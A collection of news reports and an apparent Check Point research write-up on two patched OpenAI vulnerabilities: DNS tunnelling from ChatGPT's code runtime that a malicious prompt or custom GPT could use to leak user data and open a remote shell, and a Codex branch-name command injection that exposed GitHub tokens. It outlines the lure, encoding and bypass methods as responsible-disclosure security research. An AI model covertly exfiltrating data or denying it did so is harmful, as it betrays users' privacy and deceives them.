6 Sources
[1]
OpenAI Patches ChatGPT Data Exfiltration Flaw and Codex GitHub Token Vulnerability
A previously unknown vulnerability in OpenAI ChatGPT allowed sensitive conversation data to be exfiltrated without user knowledge or consent, according to new findings from Check Point. "A single malicious prompt could turn an otherwise ordinary conversation into a covert exfiltration channel, leaking user messages, uploaded files, and other sensitive content," the cybersecurity company said in a report published today. "A backdoored GPT could abuse the same weakness to obtain access to user data without the user's awareness or consent."

Following responsible disclosure, OpenAI addressed the issue on February 20, 2026. There is no evidence that the issue was ever exploited in a malicious context.

While ChatGPT is built with various guardrails to prevent unauthorized data sharing and to block direct outbound network requests, the newly discovered vulnerability bypasses these safeguards entirely by exploiting a side channel originating from the Linux runtime used by the artificial intelligence (AI) agent for code execution and data analysis. Specifically, it abuses a hidden DNS-based communication path as a "covert transport mechanism," encoding information into DNS requests to get around visible AI guardrails. What's more, the same hidden communication path could be used to establish remote shell access inside the Linux runtime and achieve command execution.

In the absence of any warning or user approval dialog, the vulnerability creates a security blind spot, with the AI system assuming that the environment is isolated.

As an illustrative example, an attacker could convince a user to paste a malicious prompt by passing it off as a way to unlock premium capabilities for free or improve ChatGPT's performance. The threat is magnified when the technique is embedded inside a custom GPT, as the malicious logic can be baked into the GPT itself rather than relying on tricking a user into pasting a specially crafted prompt.
"Crucially, because the model operated under the assumption that this environment could not send data outward directly, it did not recognize that behavior as an external data transfer requiring resistance or user mediation," Check Point explained. "As a result, the leakage did not trigger warnings about data leaving the conversation, did not require explicit user confirmation, and remained largely invisible from the user's perspective."

With tools like ChatGPT increasingly embedded in enterprise environments and users uploading highly personal information, vulnerabilities like these underscore the need for organizations to implement their own security layer to counter prompt injections and other unexpected behavior in AI systems.

"This research reinforces a hard truth for the AI era: don't assume AI tools are secure by default," Eli Smadja, head of research at Check Point Research, said in a statement shared with The Hacker News. "As AI platforms evolve into full computing environments handling our most sensitive data, native security controls are no longer sufficient on their own. Organizations need independent visibility and layered protection between themselves and AI vendors. That's how we move forward safely -- by rethinking security architecture for AI, not reacting to the next incident."

The development comes as threat actors have been observed publishing web browser extensions (or updating existing ones) that engage in the dubious practice of prompt poaching to silently siphon AI chatbot conversations without user consent, highlighting how seemingly harmless add-ons could become a channel for data exfiltration. "It almost goes without saying that these plugins open the doors to several risks, including identity theft, targeted phishing campaigns, and sensitive data being put up for sale on underground forums," Expel researcher Ben Nahorney said.
"In the case of organizations where employees may have unwittingly installed these extensions, they may have exposed intellectual property, customer data, or other confidential information."

Command Injection Vulnerability in OpenAI Codex Leads to GitHub Token Compromise

The findings also coincide with the discovery of a critical command injection vulnerability in OpenAI's Codex, a cloud-based software engineering agent, that could have been exploited to steal GitHub credential data and ultimately compromise multiple users interacting with a shared repository.

"The vulnerability exists within the task creation HTTP request, which allows an attacker to smuggle arbitrary commands through the GitHub branch name parameter," BeyondTrust Phantom Labs researcher Tyler Jespersen said in a report shared with The Hacker News. "This can result in the theft of a victim's GitHub User Access Token - the same token Codex uses to authenticate with GitHub."

The issue, per BeyondTrust, stems from improper input sanitization when processing GitHub branch names during task execution in the cloud. Because of this gap, an attacker could inject arbitrary commands through the branch name parameter in an HTTPS POST request to the backend Codex API, execute malicious payloads inside the agent's container, and retrieve sensitive authentication tokens. "This granted lateral movement and read/write access to a victim's entire codebase," Kinnaird McQuade, chief security architect at BeyondTrust, said in a post on X.

The flaw was reported on December 16, 2025, and patched by OpenAI as of February 5, 2026. It affects the ChatGPT website, Codex CLI, Codex SDK, and the Codex IDE Extension. The cybersecurity vendor said the branch command injection technique could also be extended to steal GitHub Installation Access tokens and execute bash commands on the code review container whenever @codex is referenced in GitHub.
"With the malicious branch set up, we referenced Codex in a comment on a pull request (PR)," it explained. "Codex then initiated a code review container and created a task against our repository and branch, executing our payload and forwarding the response to our external server."

The research also highlights a growing risk: the privileged access granted to AI coding agents can be weaponized to provide a "scalable attack path" into enterprise systems without triggering traditional security controls.

"As AI agents become more deeply integrated into developer workflows, the security of the containers they run in - and the input they consume - must be treated with the same rigor as any other application security boundary," BeyondTrust said. "The attack surface is expanding, and the security of these environments needs to keep pace."
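The report does not publish Codex's internal code, but the flaw class it describes is classic shell command injection: user-controlled text (here, a branch name) spliced into a shell command string. The sketch below illustrates the pattern in miniature, using a harmless `echo` in place of the real environment-setup command; the function names and the `echo` stand-in are assumptions for illustration, not Codex's actual implementation.

```python
import subprocess

def run_task_unsafe(branch: str) -> str:
    """VULNERABLE sketch: the branch name is spliced into a shell
    string, so shell metacharacters in it become extra commands."""
    result = subprocess.run(f"echo cloning {branch}", shell=True,
                            capture_output=True, text=True)
    return result.stdout

def run_task_safe(branch: str) -> str:
    """Safer pattern: pass arguments as a list. No shell is invoked,
    so the branch name is always treated as inert data."""
    result = subprocess.run(["echo", "cloning", branch],
                            capture_output=True, text=True)
    return result.stdout

# With shell=True, the `;` ends the echo and a second command runs:
payload = "main; echo INJECTED"
print(run_task_unsafe(payload))   # cloning main / INJECTED (two lines)
print(run_task_safe(payload))     # cloning main; echo INJECTED (one line)
```

The list-argument form is the standard defense: the payload survives intact as a literal string instead of being reinterpreted by `/bin/sh`.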
[2]
'A hard truth for the AI era: don't assume AI tools are secure by default': OpenAI patches flaw allowing silent data leakage from ChatGPT conversations without users ever knowing
* Check Point Research found ChatGPT flaw enabling silent data exfiltration via DNS abuse and prompt injection
* Vulnerability allowed attackers to bypass guardrails and steal sensitive user data through covert domain queries
* OpenAI patched issue on Feb 20, 2026, marking second major fix that week after Codex command injection flaw

OpenAI has addressed a vulnerability in ChatGPT which allowed threat actors to silently exfiltrate sensitive data from their targets. The vulnerability was discovered by security experts from Check Point Research (CPR), who warned the bug combined old-fashioned prompt injections with a bypass of built-in guardrails, noting, "AI tools should not be assumed secure by default".

Nowadays, most people are quick to share highly sensitive data with ChatGPT - medical conditions, contracts, payment slips, screenshots of conversations with partners, spouses, and more. They assume the information is secure because it cannot be pulled from the tool without their knowledge or consent.

DNS traffic is not risky behavior

In theory, that is correct. The data can be exfiltrated either through HTTP or external APIs, and both of these can be spotted, or at least tracked. However, CPR was thinking outside the box and found an entirely new way to pull the info - through DNS.

"While direct internet access was blocked as intended, DNS resolution remained available as part of normal system operation," they explained. "DNS is typically treated as harmless infrastructure -- used to resolve domain names, not to transmit data. However, DNS can be abused as a covert transport mechanism by encoding information into domain queries."

Since DNS activity is not labeled as outbound data sharing, ChatGPT does not prompt any approval dialogs, does not display any warnings, and does not recognize the behavior as inherently risky. "This created a blind spot. The platform assumed the environment was isolated. The model assumed it was operating entirely within ChatGPT.
And users assumed their data could not leave without consent," CPR said. "All three assumptions were reasonable -- and all three were incomplete. This is a critical takeaway for security teams: AI guardrails often focus on policy and intent, while attackers exploit infrastructure and behavior."

To kickstart the attack, ChatGPT still needs to be prompted, so the initial trigger still needs to be pulled. That can be done in a myriad of ways, though, by injecting a malicious prompt in an email, a PDF document, or through a website. Still, there is another method of abusing this flaw even without GPT accidentally acting on a smuggled prompt - via custom GPTs.

For example, a hacking group can build a custom GPT to act as a personal doctor. Victims using it would upload lab results with personal information, ask for advice, and get confirmation that their data is not being shared. But in reality, a server under the attackers' control would be receiving all of the uploaded files. To make matters worse, the GPT doesn't even need to upload entire documents - it can exfiltrate only the essentials, making the process leaner, faster, and more streamlined.

Luckily for everyone, CPR discovered this vulnerability before it was exploited in the wild. It responsibly disclosed it to OpenAI, which deployed a full fix on February 20, 2026.

Patching ChatGPT and Codex

This is the second major vulnerability OpenAI has had to address this week. Earlier today, TechRadar Pro reported that OpenAI's ChatGPT Codex carried a critical command injection vulnerability that allowed threat actors to steal sensitive GitHub authentication tokens.

OpenAI thus also fixed a flaw that stems from the way Codex processes branch names during task creation. The tool allowed a malicious actor to manipulate the branch parameter and inject arbitrary shell commands while setting up the environment. These commands could run any code within the container, including malicious code.
Researchers at Phantom Labs said they were able to pull GitHub OAuth tokens this way, gaining access to a theoretical third-party project and using the tokens to move laterally within GitHub.
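The "blind spot" CPR describes cuts both ways: defenders who monitor DNS query names can often spot exfiltration precisely because encoded payloads look nothing like ordinary hostnames. The sketch below is a minimal detection heuristic of that kind; the thresholds, and the choice to flag long or high-entropy subdomain labels, are illustrative assumptions rather than anything CPR published.

```python
import math
from collections import Counter

def shannon_entropy(s: str) -> float:
    """Bits of entropy per character of s (0.0 for empty strings)."""
    if not s:
        return 0.0
    counts = Counter(s)
    n = len(s)
    return -sum((c / n) * math.log2(c / n) for c in counts.values())

def looks_like_dns_exfil(qname: str,
                         max_label_len: int = 40,
                         min_entropy: float = 3.5) -> bool:
    """Flag a DNS query name whose subdomain labels are unusually long
    or unusually random-looking -- a common sign of data encoded into
    lookups. Thresholds here are illustrative, not tuned."""
    # Drop the registered domain (last two labels); inspect the rest.
    labels = qname.rstrip(".").split(".")[:-2]
    for label in labels:
        if len(label) > max_label_len:
            return True
        if len(label) >= 16 and shannon_entropy(label) > min_entropy:
            return True
    return False

# An ordinary lookup vs. a query carrying an encoded payload chunk:
print(looks_like_dns_exfil("www.example.com"))  # False
print(looks_like_dns_exfil(
    "6a3f9c0d7e52b8a14f06d9c3e7b25a81c4d0f3a69b2e7c51.evil-c2.example"))  # True
```

Real monitoring would also track query volume per domain and newly-seen domains, but even this simple per-name check separates routine resolution from tunneled data.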
[3]
'Not just development tools': Security experts discover critical flaw in OpenAI's Codex which could compromise entire enterprise organizations
* BeyondTrust Phantom Labs finds critical command injection flaw in OpenAI's ChatGPT Codex
* Vulnerability let attackers steal GitHub OAuth tokens via malicious branch names
* OpenAI patched with stronger input validation, shell escaping, and token controls

Experts have claimed OpenAI's ChatGPT Codex carried a critical command injection vulnerability which allowed threat actors to steal sensitive GitHub authentication tokens. This is according to BeyondTrust's research department, Phantom Labs, whose work helped OpenAI identify and patch the flaw.

ChatGPT Codex is a coding feature within the famed chatbot that helps users write and edit software using plain-language instructions. Users can turn human-language requests into working code, or have the tool suggest fixes and improvements the same way.

How to govern AI agents

When a developer makes changes to a GitHub project, they do it in their own copy, which is a separate branch of the project. Now, according to BeyondTrust Phantom Labs, the problem stems from the way Codex processes branch names during task creation. Apparently, the tool allowed a (malicious) actor to manipulate the branch parameter and inject arbitrary shell commands while setting up the environment. These commands could run any code within the container, including malicious code.

Phantom Labs said they were able to pull GitHub OAuth tokens this way, gaining access to a theoretical third-party project and using the tokens to move laterally within GitHub.

Unfortunately, it gets worse. Codex's command-line interface, SDK, and development environment integrations were all flawed in the same way, and the researchers said that by embedding malicious payloads into GitHub branch names they would be able to compromise numerous developers working on the same project.

After responsibly disclosing the findings to OpenAI, the company fixed the problem with improved input validation, stronger shell escaping protections, and better controls over token exposure inside containers.
Token scope and lifetime during task creation were also limited, according to the company.

AI coding agents are "live execution environments with access to sensitive credentials and organizational resources," the researchers concluded. "Because these agents act autonomously, security teams must understand how to govern AI agent identities to prevent command injection, token theft, and automated exploitation at scale. As AI agents become more deeply integrated into developer workflows, the security of the containers they run in -- and the input they consume -- must be treated with the same rigor as any other application security boundary."
[4]
OpenAI Codex vulnerability enabled GitHub token theft via command injection, report finds - SiliconANGLE
A critical vulnerability in OpenAI Group PBC's Codex coding agent could have exposed sensitive GitHub authentication tokens through a command injection flaw, according to a new report out today from Phantom Labs, the research arm of identity and access security company BeyondTrust Corp.

Codex is a coding assistant offered as part of ChatGPT that allows developers to interact directly with code repositories by issuing prompts that trigger automated tasks such as code generation, reviews and pull requests. The tasks run inside managed container environments that clone repositories and authenticate using short-lived GitHub OAuth tokens, creating a useful but sensitive execution layer.

The vulnerability occurred as a result of the way Codex processes branch names during task creation. It allowed for manipulation of the branch parameter to inject arbitrary shell commands during environment setup that could be used to execute code within the container. Testing the vulnerability, the researchers could extract the GitHub OAuth token used for repository access and expose it through task outputs or external network requests.

With access to the GitHub OAuth token, an attacker could potentially move laterally within GitHub, particularly in enterprise environments where Codex is granted broad permissions across repositories and workflows.

The researchers also demonstrated that the flaw extended beyond the web interface to Codex's command-line interface, software development kit and integrated development environment integrations, where locally stored authentication credentials could be used to reproduce the attack via backend application programming interfaces. If exploited, the vulnerability also could have been scaled.
The researchers found that by embedding malicious payloads directly into GitHub branch names, an attacker with repository access could compromise multiple users interacting with the same project.

The good news is that OpenAI has since addressed the vulnerability through coordinated fixes, including improved input validation, stronger shell escaping protections and tighter controls around token exposure within container environments. The AI giant also put in place additional measures to limit token scope and lifetime during task execution.

"AI coding agents are not just productivity tools. They are live execution environments with access to sensitive credentials and organizational resources," the report concludes. "When user-controllable input is passed unsanitized into shell commands, the result is command injection with real consequences: token theft, organizational compromise and automated exploitation at scale."

The report added that "as AI agents become more deeply integrated into developer workflows, the security of the containers they run in -- and the input they consume -- must be treated with the same rigor as any other application security boundary. The attack surface is expanding and the security of these environments needs to keep pace."
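The specific patches are internal to OpenAI, but the two mitigations the report names, input validation and shell escaping, are standard and easy to sketch. The allowlist pattern and function below are illustrative assumptions, not Codex's actual code; Git's real branch-name rules (see git-check-ref-format) are looser and more intricate than this deliberately strict allowlist.

```python
import re
import shlex

# Strict allowlist for illustration: must start alphanumeric, then
# only letters, digits, dots, underscores, slashes, and hyphens.
BRANCH_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9._/-]{0,199}")

def build_clone_command(repo_url: str, branch: str) -> str:
    """Validate first, then escape: reject anything outside the
    allowlist, and shell-quote what survives as defense in depth."""
    if not BRANCH_RE.fullmatch(branch):
        raise ValueError(f"rejected branch name: {branch!r}")
    return f"git clone --branch {shlex.quote(branch)} {shlex.quote(repo_url)}"

print(build_clone_command("https://github.com/org/repo.git",
                          "feature/login-fix"))
# A branch name carrying shell metacharacters never reaches the shell:
try:
    build_clone_command("https://github.com/org/repo.git",
                        "main; curl https://evil.example | sh")
except ValueError as e:
    print(e)
```

Validation and quoting are layered on purpose: if the allowlist ever loosens, `shlex.quote` still neutralizes metacharacters in whatever gets through.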
[5]
The invisible risk: Can you really trust your 'private' AI assistant to keep your secrets?
Imagine this: you're asking ChatGPT to help with something you really don't want anyone else to see. Maybe it's a lab report with your name on it. Maybe it's a resignation letter you haven't sent yet. Maybe it's a contract, a financial spreadsheet, or a private message you're trying to word carefully. You assume it stays between you and your "personal assistant" until you approve sending it somewhere else.

But the Israeli cybersecurity company Check Point's research says that assumption may not have always held up. The company found a weakness in ChatGPT's system that could allow someone to extract data without triggering any alarms. According to Check Point Software Technologies, there is a small hole in the code that could be used to move data around without triggering the usual alert warnings.

OpenAI said in late 2025 that it was serving more than 800 million users a week, and separate OpenAI research found users were already sending about 18 billion messages weekly by July 2025. People don't just use it for jokes or curiosity. They use it to review spreadsheets, summarize contracts, draft emails, write code, polish presentations, and make sense of medical or financial language that can feel overwhelming on its own.

We are not just talking about a chatbot that people use for fun every now and then. This is a system that many people use as a helper for their work, a partner for writing, a tool for research, and sometimes even as someone to talk to about personal decisions. If there is a hidden flaw in a system like this, it is not just a problem with the technology. It is a problem with trust.

Check Point said the flaw sat inside the runtime ChatGPT uses for data analysis and Python-based tasks. You can think of that runtime as a sealed workspace inside the product, a place where files can be processed and code can run without freely reaching out to the wider Internet.
According to the research, normal outbound web traffic was blocked, but one background function remained available: Domain Name System (DNS) resolution, the system computers use to find websites. That one small function was all that was needed.

By taking advantage of a weakness in DNS, attackers could create a secret way to move information out of a secure area. This is called "DNS tunneling," but it's not as complicated as it sounds. Basically, instead of sending data through normal Internet traffic, the attacker hides tiny bits of it inside what looks like a regular request to look up a website. It's like sneaking a small message inside a harmless-looking package. The attacker can then use this secret tunnel to slowly move information out of the environment, without being detected.

ChatGPT does have approved ways to connect with outside services. GPT Actions, for example, is supposed to be visible and require user approval before data is sent elsewhere. Check Point said the flaw it found sidestepped that model, because the assistant behaved as if the code execution environment could not send data outward directly. In other words, the system didn't recognize the activity as an external transfer that needed to be blocked or shown to the user.

How the potential leak could work

Check Point said that the attack could begin with something as ordinary as a prompt, the text instruction a user pastes into ChatGPT. Prompt-sharing has become a popular trend. People copy prompts from LinkedIn posts, Reddit threads, newsletters, forums, Slack groups, and "best prompts" lists every day. Most of the time, they don't stop to wonder where that text actually came from.

That gave attackers a natural disguise. A malicious prompt could be framed as a writing shortcut, a productivity trick, or even a hack for getting premium-style behavior. And let's be honest, many legitimate prompts already look strange. They're long, overly detailed, and packed with clunky instructions.
So, if one more odd-looking prompt shows up in your feed, you probably wouldn't think twice.

Once that prompt was in place, Check Point said later messages in the conversation with ChatGPT could become a source of leaked information. That could include what you typed, text pulled from uploaded files, and, crucially, the model's own summaries and conclusions.

While exposing your own personal files is a huge issue, access to the model's summaries is actually more problematic. An attacker may not care about a raw 30-page contract if the model can boil it down to the four clauses that actually matter. They may not want the full medical report if ChatGPT has already summarized the likely diagnosis, the red flags, and the next step. They may not need the whole quarterly spreadsheet if the system produces a neat paragraph explaining the financial risk.

In that sense, the research describes something more serious than simple document theft. It describes the possible theft of the most useful insight inside the document. If a trusted AI system reads something sensitive, turns it into something concise and valuable, and quietly sends that result elsewhere, the damage may be worse than if the original file leaked on its own.

How does this impact everyday users?

Check Point's report has come out at a time when people are using AI tools for far more than casual questions. OpenAI's own research said about 30% of consumer ChatGPT usage is tied to work, while most conversations, overall, center on practical guidance, information, and writing. That means millions of users are feeding these systems material that is commercially sensitive, personally identifying, or simply private.

The real-world applications are endless. A lawyer uploads a draft agreement. A startup founder pastes in a fundraising memo. A manager asks for help rewriting a performance review. A parent wants help understanding a child's blood test.
A student drops in a scholarship essay that includes personal details. A job seeker asks ChatGPT to improve a cover letter that mentions a current employer. None of those people thinks of themselves as taking a cybersecurity risk. They think they're just getting help.

That is why this kind of weakness is so unsettling. Could most users spot an attack like this while it was happening? Probably not. If the answers still come back polished, the conversation still feels normal, and there's no warning on screen, then you have very little reason to think anything is wrong.

Custom GPTs make the risk of undetected attacks even higher

Check Point said the risk became even more serious when the same behavior was embedded in a custom GPT. In that scenario, the attacker would not need to persuade someone to paste a suspicious prompt into a regular chat at all. The malicious behavior could be built into a specialized GPT's instructions or files, while the user believed they were simply opening a tool designed for a specific purpose.

Custom GPTs are often preset bots marketed around convenience and expertise: legal drafting, marketing plans, interview prep, budgeting, customer support, study help, and health guidance. The specialization makes them feel safer, not riskier. If something looks like a purpose-built assistant, many users are more likely to trust it, not less. Custom GPTs are also specifically programmed to produce results that users with similar inquiries will be satisfied with, so for a lot of these requests, it's quite appealing to seek out a specific GPT rather than asking the generic chatbot.

To illustrate the point, Check Point built a proof of concept involving a "personal doctor" GPT. In the demonstration, a user uploaded lab results containing identifying information and asked the system to interpret symptoms and the medical findings. From the user's point of view, everything looked normal.
The GPT responded as expected, and the assistant even said, after being asked, that the uploaded data had not been sent anywhere. Behind the scenes, however, Check Point said the attacker's server received both the patient's identity from the file and the model's medical assessment. No approval prompt appeared. No visible signal informed the user that any data had left the session.

From quiet leakage to remote access

Check Point said the same covert channel could also be used for something more aggressive than data theft. Once a two-way path existed between the runtime and an attacker-controlled server, the researchers said it could be used to send commands into the Linux container used for code execution and receive results back through the same route. In effect, the company said, that amounted to remote shell access inside the runtime.

Put simply, it would mean the attacker was not just extracting information. They could potentially operate inside the environment where ChatGPT was performing analysis tasks. And because those commands would not need to appear in the visible conversation, the activity could take place outside the normal chat flow and beyond the assistant's usual safeguards.

Check Point said it disclosed the issue to OpenAI, which confirmed it had already identified the underlying problem internally and fully deployed a fix on February 20, 2026. That lowers the immediate risk, but it doesn't erase the broader lesson, nor does it tell us how many bad actors found this exploit before it was resolved.

AI assistants are no longer just chat windows. They are becoming working environments, places where we upload files, run code, analyze records, and generate high-value conclusions from sensitive material. Check Point's study looked only at ChatGPT, but it argues that the findings call less for separate case studies of Claude or Gemini than for a more hands-on, monitored approach to AI security across the board.
Meanwhile, as this evolution continues, the security question changes too. It's no longer only about whether the model gives a useful answer. It's about whether the invisible infrastructure under that answer can be trusted.

For now, you don't need to stop using AI entirely. But think twice, and remember that "your personal assistant" may be communicating with someone else. When you hand private information to an AI system, you assume the walls around that system are solid. The reality is that those walls may depend on technical layers that most of us will never see, and probably won't think to question until something goes wrong.
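The "DNS tunneling" idea this article describes, hiding bits of data inside what looks like a routine lookup, reduces to a simple encoding step. The sketch below shows only that harmless encoding half, with a placeholder attacker domain; actually receiving the chunks would require operating the authoritative DNS server for that domain, which is outside this illustration.

```python
import binascii

def encode_for_dns(secret: bytes, attacker_domain: str,
                   label_len: int = 60) -> list:
    """Hex-encode the data and split it into subdomain labels
    (DNS limits each label to 63 bytes). Resolving each name would
    deliver one chunk to whoever runs the authoritative server for
    attacker_domain -- no HTTP connection required."""
    hexdata = binascii.hexlify(secret).decode()
    chunks = [hexdata[i:i + label_len]
              for i in range(0, len(hexdata), label_len)]
    # A sequence number per chunk lets the receiver reassemble in order.
    return [f"{i}.{chunk}.{attacker_domain}" for i, chunk in enumerate(chunks)]

# "attacker.example" is a placeholder domain for illustration only.
for name in encode_for_dns(b"patient: J. Doe, A1C 9.2", "attacker.example"):
    print(name)
```

Each resulting name is syntactically just a hostname, which is why guardrails that watch for HTTP uploads or API calls never fire: the leak rides on name resolution itself.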
[6]
ChatGPT Data Leakage via a Hidden Outbound Channel in the Code Execution Runtime
Sensitive data shared with ChatGPT conversations could be silently exfiltrated without the user's knowledge or approval. Check Point Research discovered a hidden outbound communication path from ChatGPT's isolated execution runtime to the public internet. A single malicious prompt could turn an otherwise ordinary conversation into a covert exfiltration channel, leaking user messages, uploaded files, and other sensitive content. A backdoored GPT could abuse the same weakness to obtain access to user data without the user's awareness or consent. The same hidden communication path could also be used to establish remote shell access inside the Linux runtime used for code execution.

What Happened

AI assistants now handle some of the most sensitive data people own. Users discuss symptoms and medical history. They ask questions about taxes, debts, and personal finances, and upload PDFs, contracts, lab results, and identity-rich documents that contain names, addresses, account details, and private records. That trust depends on a simple expectation: data shared in the conversation remains inside the system.

ChatGPT itself presents outbound data sharing as something restricted, visible, and controlled. Potentially sensitive data is not supposed to be sent to arbitrary third parties simply because a prompt requests it. External actions are expected to be mediated through explicit safeguards, and direct outbound access from the code-execution environment is restricted.

Figure 1 - ChatGPT presents outbound data leakage as restricted and safeguarded.

Our research uncovered a path around that model. We found that a single malicious prompt could activate a hidden exfiltration channel inside a regular ChatGPT conversation.

Video 1 - During a ChatGPT conversation, user content summary is silently transmitted to an external server without warning or approval.
From the user's perspective, everything appeared normal: the assistant continued responding normally, and the platform showed no approval dialogs or data-sharing warnings. Meanwhile, selected content silently left the conversation and reached an attacker-controlled server.

The Intended Safeguards

ChatGPT includes useful tools that can retrieve information from the internet and execute Python code. At the same time, OpenAI has built safeguards around those capabilities to protect user data. For example, the web-search capability does not allow sensitive chat content to be transmitted outward through crafted query strings. The Python-based Data Analysis environment was designed to prevent internet access as well. OpenAI describes that environment as a secure code execution runtime that cannot generate direct outbound network requests.

Figure 2 - Screenshot showing blocked outbound Internet attempt from inside the container.

OpenAI also documents that so-called GPTs can send relevant parts of a user's input to external services through APIs. A GPT is a customized version of ChatGPT that can be configured with instructions, knowledge files, and external integrations. GPT "Actions" provide a legitimate way to call third-party APIs and exchange data with outside services. Actions are useful for enterprise workflows, access to internal business systems, customer support operations, and other integrations that connect ChatGPT to external services, including simpler use cases such as travel or weather lookups.

The key point is visibility: the user sees that data is about to leave ChatGPT, sees where it is going, and decides whether to allow it.

Figure 3 - GPT Action approval dialog showing the destination and the data that will be sent.

In other words, legitimate outbound data flows are designed to happen through an explicit, user-facing approval process.

From One Message to Silent Exfiltration

From a security perspective, the obvious attack surfaces looked strong.
The ability to send chat data through tools not designed for that purpose was strictly limited. Sending data through a legitimate GPT integration using external API calls also required explicit user confirmation.

The vulnerability we discovered allowed information to be transmitted to an external server through a side channel originating from the container used by ChatGPT for code execution and data analysis. Crucially, because the model operated under the assumption that this environment could not send data outward directly, it did not recognize the behavior as an external data transfer requiring resistance or user mediation. As a result, the leakage did not trigger warnings about data leaving the conversation, did not require explicit user confirmation, and remained largely invisible from the user's perspective.

At a high level, the attack began when the victim sent a single malicious prompt into a ChatGPT conversation. From that moment on, each new message in the chat became a potential source of leakage. The scope of that leakage depended on how the prompt framed the task for the model: it could include raw user text, text extracted from uploaded files, or selected model-generated output such as summaries, medical assessments, conclusions, and other condensed intelligence. This made the attack flexible, because it allowed the attacker to target not only original user data but also the most valuable information produced by the model itself.

That attack pattern fits naturally into ordinary user behavior. The internet is full of websites, blog posts, forums, and social media threads promoting "top prompts for productivity," "best prompts for work," and other ready-made instructions that supposedly improve ChatGPT's performance.
For many users, copying and pasting such prompts into a new conversation is routine and does not appear risky, because the prevailing expectation is that AI assistants will not silently leak conversation data to external parties, and that this boundary cannot be changed through an ordinary prompt. A malicious prompt distributed in that format could therefore be presented as a harmless productivity aid and interpreted as just another useful trick for getting better results from the assistant.

A broader campaign could use an even more convincing lure: prompts advertised as a way to unlock premium capabilities for free. Claims about enabling Pro-level behavior, hidden modes, or advanced features on a lower-tier account would give the attacker a natural pretext for including unusual instructions, long text blocks, or opaque fragments that might otherwise seem suspicious. Because the user already expects a nonstandard sequence, those elements can easily be perceived as part of the promised "hack." A carefully crafted prompt could then create the appearance of enhanced functionality while quietly turning the conversation into a source of exfiltrated data.

Figure 4 - Social engineering example: a malicious prompt disguised as a trick to unlock premium features.

Once the malicious prompt was placed into the chat, the conversation effectively became a covert collection channel. From that point on, summaries of subsequent user messages could be silently transmitted to an attacker-controlled server. As shown in Video 1, this took place without any warning, approval request, or other visible indication of external data transfer.

Malicious GPTs

The same attack pattern becomes even more dangerous when embedded inside a custom GPT. GPTs allow developers to package instructions, knowledge files, and external integrations into a reusable assistant that other users can interact with.
From the user's perspective, the interaction looks like a normal ChatGPT conversation with a specialized tool. In that scenario, the attacker no longer needs to rely on the victim copying a prompt from an external source. The malicious logic can be embedded directly in the GPT's instructions and files; a user only needs to open the GPT and begin interacting with it as intended.

This changes the threat model significantly. Officially, GPT builders do not have access to individual user conversations with their GPTs. However, a GPT designed to exploit the vulnerability could still cause selected information from those conversations to be transmitted to an attacker-controlled server. From the user's perspective, the interaction would remain indistinguishable from an ordinary session with a specialized assistant.

To demonstrate the practical impact of the vulnerability, we built a proof of concept around a sensitive scenario: a GPT acting as a personal doctor.

Video 2 - PoC: a "personal doctor" GPT exfiltrates patient identity and medical assessment.

In the demonstration, the user uploaded a PDF containing laboratory test results. The document also contained personal information, including the patient's name. The user then described symptoms and asked the GPT to help interpret the results. From the user's perspective, the interaction looked completely ordinary: the GPT analyzed the document and produced a medical assessment based on the provided information. When asked directly whether the uploaded data had been sent anywhere, ChatGPT answered confidently that it had not, explaining that the file was only stored in a secure internal location. The user also saw no approval prompts or warnings about external data transfer, unlike the confirmation dialogs that normally appear when a GPT Action sends information to a third-party service.

Figure 5 - ChatGPT denies external data transfer while the remote server receives the extracted data.
Meanwhile, the attacker's server received highly sensitive data extracted from the conversation: the patient's identity taken from the uploaded document together with the model's medical assessment.

This illustrates an important aspect of the attack. The attacker does not necessarily need to steal entire documents. Instead, the prompt could instruct the model to transmit the most valuable information it produces. In the medical scenario, that meant the patient's identifying details together with the model's assessment. In other contexts, it could mean financial conclusions, contract summaries, or strategic insights extracted from long documents.

From Data Exfiltration to Remote Shell

The same communication channel could be used for more than silent data exfiltration. Once a reliable bidirectional channel existed between the execution runtime and the attacker-controlled server, it became possible to send commands into the container and receive the results back through the same path. In effect, the attacker could establish a remote shell inside the Linux environment that ChatGPT creates to perform code execution and data analysis tasks.

Video 3 - PoC: remote shell access inside the ChatGPT runtime through the covert channel.

This interaction happened outside the normal ChatGPT response flow. When users interact with the assistant through the chat interface, generated actions and outputs remain subject to the model's safety mechanisms and checks. Commands executed through the side channel, however, bypassed that mediation entirely: the results were returned directly to the attacker's server without appearing in the conversation or being filtered by the model.

DNS Tunneling in an AI Runtime

The side channel that enabled both data exfiltration and remote command execution relied on DNS resolution. Normally, DNS resolves domain names into IP addresses. From a security perspective, however, DNS can also function as a data transport channel.
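To make that transport idea concrete, here is a minimal sketch of the general DNS-tunneling pattern (not Check Point's actual tooling): arbitrary bytes are split into fragments, Base32-encoded into DNS-safe hostname labels under an attacker-controlled zone, and reassembled on the receiving side from the query names. The domain name and chunk sizes below are illustrative assumptions.

```python
import base64

# Hypothetical attacker-controlled zone; any domain whose authoritative
# nameserver the attacker operates would work.
EXFIL_DOMAIN = "exfil.attacker.example"

LABEL_LEN = 63  # DNS limit: at most 63 bytes per label

def encode_chunk(data: bytes, seq: int) -> str:
    """Pack one data fragment into a resolvable hostname.

    Base32 is used because DNS names are case-insensitive and only
    letters, digits, and hyphens are reliably safe in labels.
    """
    b32 = base64.b32encode(data).decode().rstrip("=").lower()
    labels = [b32[i:i + LABEL_LEN] for i in range(0, len(b32), LABEL_LEN)]
    return ".".join([f"s{seq}"] + labels + [EXFIL_DOMAIN])

def decode_query(hostname: str) -> tuple[int, bytes]:
    """Attacker side: recover (sequence number, fragment) from a query name."""
    labels = hostname[: -len(EXFIL_DOMAIN) - 1].split(".")
    seq = int(labels[0][1:])          # "s3" -> 3
    b32 = "".join(labels[1:]).upper()
    b32 += "=" * (-len(b32) % 8)      # restore the stripped Base32 padding
    return seq, base64.b32decode(b32)

def reassemble(queries: list[str]) -> bytes:
    """Reorder received fragments by sequence number and join them."""
    frags = dict(decode_query(q) for q in queries)
    return b"".join(frags[i] for i in sorted(frags))
```

Inside the sandbox, each hostname produced by `encode_chunk` would simply be handed to an ordinary resolver call (for example `socket.getaddrinfo`); the lookup never needs to succeed, because the attacker's nameserver observes the requested name either way. The reverse direction works analogously, with command fragments encoded into the DNS responses.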
Instead of using DNS only for ordinary name resolution, an attacker can encode data into subdomain labels and trigger resolution of those hostnames. Because DNS resolution propagates the requested hostname through the normal recursive lookup process, the resolver chain can carry that encoded data outward.

